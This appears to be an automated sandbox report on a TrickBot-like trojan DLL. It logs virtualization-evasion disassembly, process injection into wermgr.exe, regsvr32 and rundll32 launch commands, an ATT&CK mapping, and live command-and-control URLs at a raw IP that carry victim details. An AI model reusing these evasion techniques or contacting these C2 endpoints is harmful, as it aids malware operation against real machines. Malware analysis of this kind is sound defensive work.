Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: DAQzQ6FyNs.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: DAQzQ6FyNs.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: fltLib.pdb/ source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.336942703.00000000052FE000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: regsvr32.pdbk source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdb# source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.336714628.000000000346D000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdba source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb1 source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: regsvr32.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb% source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.336842453.0000000003461000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb; source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdbY source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb= source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.336714628.000000000346D000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000001A.00000003.336566562.0000000003467000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\DAQzQ6FyNs.dll

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\System32\wermgr.exe	RDTSC instruction interceptor: First address: 000001DDAAC4AF30 second address: 000001DDAAC4AF30 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec eax 0x0000000b mov esi, eax 0x0000000d call dword ptr [00012828h] 0x00000013 mov ecx, 7FFE0320h 0x00000018 dec eax 0x00000019 mov ecx, dword ptr [ecx] 0x0000001b mov eax, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 imul eax, ecx 0x00000026 dec eax 0x00000027 shr eax, 18h 0x0000002a ret 0x0000002b inc esp 0x0000002c mov esi, eax 0x0000002e dec eax 0x0000002f mov eax, esi 0x00000031 dec eax 0x00000032 not eax 0x00000034 dec eax 0x00000035 mov ebx, 63DA9500h 0x0000003a pop esi 0x0000003b cmpsb 0x0000003c aaa 0x0000003d push 00000048h 0x0000003f or ebx, eax 0x00000041 mov edi, eax 0x00000043 not edi 0x00000045 call 00007FFA10B9741Eh 0x0000004a rdtsc
Source: C:\Windows\System32\wermgr.exe	RDTSC instruction interceptor: First address: 000002875D53AF30 second address: 000002875D53AF30 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec eax 0x0000000b mov esi, eax 0x0000000d call dword ptr [00012828h] 0x00000013 mov ecx, 7FFE0320h 0x00000018 dec eax 0x00000019 mov ecx, dword ptr [ecx] 0x0000001b mov eax, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 imul eax, ecx 0x00000026 dec eax 0x00000027 shr eax, 18h 0x0000002a ret 0x0000002b inc esp 0x0000002c mov esi, eax 0x0000002e dec eax 0x0000002f mov eax, esi 0x00000031 dec eax 0x00000032 not eax 0x00000034 dec eax 0x00000035 mov ebx, 63DA9500h 0x0000003a pop esi 0x0000003b cmpsb 0x0000003c aaa 0x0000003d push 00000048h 0x0000003f or ebx, eax 0x00000041 mov edi, eax 0x00000043 not edi 0x00000045 call 00007FFA10F0705Eh 0x0000004a rdtsc
Source: C:\Windows\System32\wermgr.exe	RDTSC instruction interceptor: First address: 000002B08744AF30 second address: 000002B08744AF30 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec eax 0x0000000b mov esi, eax 0x0000000d call dword ptr [00012828h] 0x00000013 mov ecx, 7FFE0320h 0x00000018 dec eax 0x00000019 mov ecx, dword ptr [ecx] 0x0000001b mov eax, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 imul eax, ecx 0x00000026 dec eax 0x00000027 shr eax, 18h 0x0000002a ret 0x0000002b inc esp 0x0000002c mov esi, eax 0x0000002e dec eax 0x0000002f mov eax, esi 0x00000031 dec eax 0x00000032 not eax 0x00000034 dec eax 0x00000035 mov ebx, 63DA9500h 0x0000003a pop esi 0x0000003b cmpsb 0x0000003c aaa 0x0000003d push 00000048h 0x0000003f or ebx, eax 0x00000041 mov edi, eax 0x00000043 not edi 0x00000045 call 00007FFA10B9741Eh 0x0000004a rdtsc

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Windows\System32\wermgr.exe	Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,languageOrLocalQueried,languageOrLocalQueried,adjustToken,systemQueried,systemQueried,threadDelayed,threadDelayed,mutantCreated,languageOrLocalQueried,threadInformationSet,threadInformationSet,threadInformationSet,threadInformationSet,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried
Source: C:\Windows\System32\wermgr.exe	Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,languageOrLocalQueried,languageOrLocalQueried,adjustToken,systemQueried,systemQueried,threadDelayed,threadDelayed,mutantCreated,languageOrLocalQueried,threadInformationSet,threadInformationSet,threadInformationSet,threadInformationSet,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried
Source: C:\Windows\System32\wermgr.exe	Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,languageOrLocalQueried,languageOrLocalQueried,adjustToken,systemQueried,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,mutantCreated,languageOrLocalQueried,threadInformationSet,threadInformationSet,threadInformationSet,threadInformationSet,threadDelayed,threadDelayed,threadDelayed

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\System32\wermgr.exe	Last function: Thread delayed
Source: C:\Windows\System32\wermgr.exe	Last function: Thread delayed
Source: C:\Windows\System32\wermgr.exe	Last function: Thread delayed
Source: C:\Windows\System32\wermgr.exe	Last function: Thread delayed
Source: C:\Windows\System32\wermgr.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 59530
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 35040
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 33790

Source: WerFault.exe, 0000001A.00000002.367456218.0000000005271000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW\3
Source: WerFault.exe, 0000001A.00000002.367837473.00000000052F5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 2B087440000
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 7FF779B72860
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 1DDAAC40000
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 7FF779B72860
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 2875D530000
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 7FF779B72860

Allocates memory in foreign processes

Show sources

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: C:\Windows\System32\wermgr.exe base: 2B087440000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\System32\wermgr.exe base: 1DDAAC40000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\System32\wermgr.exe base: 2875D530000 protect: page execute and read and write

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe

Source: C:\Windows\System32\wermgr.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wermgr.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wermgr.exe	Queries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading1	Process Injection211	Masquerading1	OS Credential Dumping	Security Software Discovery111	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion11	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection211	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DAQzQ6FyNs.dll	11%	Virustotal		Browse
DAQzQ6FyNs.dll	16%	ReversingLabs	Win32.Trojan.Trickpak
DAQzQ6FyNs.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
tls13.taboola.map.fastly.net	0%	Virustotal	Browse
btloader.com	1%	Virustotal	Browse
edge.gycpi.b.yahoodns.net	0%	Virustotal	Browse
img.img-taboola.com	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/user/user/0/	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F199655af051ff7c0f5750635e94a1c08.jpeg	0%	Avira URL Cloud	safe
https://btloader.com/tag?o=6208086025961472&upapi=true	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg	0%	Avira URL Cloud	safe
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/0/Windows%2010%20x64/1108/185.32.222.18/818EAD17B250A7EF3FD678E8105C4E046AE985776F1D9E89478E18E60834AFFE/DpdFlLtjjDPF77r9pp7NDP/	0%	Avira URL Cloud	safe
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/path/C:%5CUsers%5Cuser%5CAppData%5CRoaming%5Cfree_LogicMonitorUQG4AO%5CgsDAQzQ6FyNsks.our/0/	0%	Avira URL Cloud	safe
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb5bcb7af6a18196797e0801a99a8e259.jpg	0%	Avira URL Cloud	safe
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/5/file/	0%	Avira URL Cloud	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/23/100019/	0%	Avira URL Cloud	safe
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/DNSBL/not%20listed/0/	0%	Avira URL Cloud	safe
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	2.22.155.145	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
ipinfo.io	34.117.59.81	true	false		high
hblg.media.net	2.22.155.145	true	false		high
lg3.media.net	2.22.155.145	true	false		high
btloader.com	104.26.6.139	true	false	1%, Virustotal, Browse	unknown
geolocation.onetrust.com	104.20.184.68	true	false		high
edge.gycpi.b.yahoodns.net	87.248.118.23	true	false	0%, Virustotal, Browse	unknown
18.222.32.185.b.barracudacentral.org	unknown	unknown	false		high
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
18.222.32.185.spam.dnsbl.sorbs.net	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	false	2%, Virustotal, Browse	unknown
18.222.32.185.cbl.abuseat.org	unknown	unknown	false		high
s.yimg.com	unknown	unknown	false		high
web.vortex.data.msn.com	unknown	unknown	false		high
18.222.32.185.dnsbl-1.uceprotect.net	unknown	unknown	false		unknown
cvision.media.net	unknown	unknown	false		high
18.222.32.185.zen.spamhaus.org	unknown	unknown	false		high
dcdn.adnxs.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/user/user/0/	false	Avira URL Cloud: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F199655af051ff7c0f5750635e94a1c08.jpeg	false	Avira URL Cloud: safe	unknown
https://btloader.com/tag?o=6208086025961472&upapi=true	false	URL Reputation: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg	false	Avira URL Cloud: safe	unknown
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/0/Windows%2010%20x64/1108/185.32.222.18/818EAD17B250A7EF3FD678E8105C4E046AE985776F1D9E89478E18E60834AFFE/DpdFlLtjjDPF77r9pp7NDP/	false	Avira URL Cloud: safe	unknown
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/path/C:%5CUsers%5Cuser%5CAppData%5CRoaming%5Cfree_LogicMonitorUQG4AO%5CgsDAQzQ6FyNsks.our/0/	false	Avira URL Cloud: safe	unknown
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb5bcb7af6a18196797e0801a99a8e259.jpg	false	Avira URL Cloud: safe	unknown
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/5/file/	false	Avira URL Cloud: safe	unknown
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/23/100019/	false	Avira URL Cloud: safe	unknown
https://179.189.229.254/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/DNSBL/not%20listed/0/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://searchads.msn.net/.cfm?&&kp=1&	~DFC2EE9AE5846D5CA6.TMP.6.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.8.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.8.dr	false		high
https://contextualtag.media.net	~DFC2EE9AE5846D5CA6.TMP.6.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na	de-ch[1].htm.8.dr	false		high
https://onedrive.live.com;Fotos	52-478955-68ddb2ab[1].js.8.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/sport?ocid=StripeOCID	de-ch[1].htm.8.dr	false		high
https://www.msn.com/de-ch/news/other/zwei-personen-nach-angriffen-im-niederdorf-verletzt/ar-AAP4mtE?	de-ch[1].htm.8.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.8.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	52-478955-68ddb2ab[1].js.8.dr	false		high
https://www.msn.com/de-ch/news/other/ich-finde-keine-ruhe-bis-er-begraben-ist/ar-AAP2O4C?ocid=hploca	de-ch[1].htm.8.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.8.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	52-478955-68ddb2ab[1].js.8.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	~DFC2EE9AE5846D5CA6.TMP.6.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.8.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	52-478955-68ddb2ab[1].js.8.dr	false		high
https://www.msn.com/de-ch/news/other/essen-im-zelt-und-zwischennutzung-im-lokal/ar-AAP4brs?ocid=hplo	de-ch[1].htm.8.dr	false		high
http://www.reddit.com/	msapplication.xml4.6.dr	false		high
